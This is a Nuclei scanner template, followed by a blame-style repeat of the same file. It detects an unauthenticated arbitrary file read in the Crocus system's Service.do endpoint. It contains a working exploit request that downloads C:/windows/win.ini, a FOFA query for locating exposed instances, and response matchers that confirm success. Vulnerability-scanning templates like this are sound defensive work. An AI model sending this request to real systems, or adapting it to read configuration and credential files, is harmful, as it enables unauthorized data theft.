nuclei-templates/http/vulnerabilities/other/crocus-lfi.yaml

id: crocus-lfi

info:
  name: Crocus system Service.do  - Arbitrary File Read
  author: pussycat0x
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the Service.do interface of Ruiming Technology's Crocus system. An unauthenticated remote attacker can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc. This leaves the website in an extremely unsafe state.
  reference:
    - https://github.com/wy876/POC/blob/main/%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AFCrocus%E7%B3%BB%E7%BB%9FService.do%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/ThirdResource/respond/respond.min.js" && title="Crocus"
  tags: crocus,lfi

http:
  - raw:
      - |
        GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

      - type: status
        status:
          - 200
Create crocus-lfi.yaml 2024-07-04 07:50:45 +00:00			`id: crocus-lfi`

			`info:`
			`name: Crocus system Service.do - Arbitrary File Read`
			`author: pussycat0x`
			`severity: high`
			`description: \|`
minor update 2024-07-04 10:34:22 +00:00			`There is an arbitrary file reading vulnerability in the Service.do interface of Ruiming Technology's Crocus system. An unauthenticated remote attacker can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc. This leaves the website in an extremely unsafe state.`
Create crocus-lfi.yaml 2024-07-04 07:50:45 +00:00			`reference:`
			`- https://github.com/wy876/POC/blob/main/%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AFCrocus%E7%B3%BB%E7%BB%9FService.do%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md`
			`metadata:`
			`verified: true`
			`max-request: 1`
			`fofa-query: body="/ThirdResource/respond/respond.min.js" && title="Crocus"`
			`tags: crocus,lfi`

			`http:`
			`- raw:`
			`- \|`
			`GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1`
			`Host: {{Hostname}}`
			`X-Requested-With: XMLHttpRequest`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "bit app support"`
			`- "fonts"`
			`- "extensions"`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`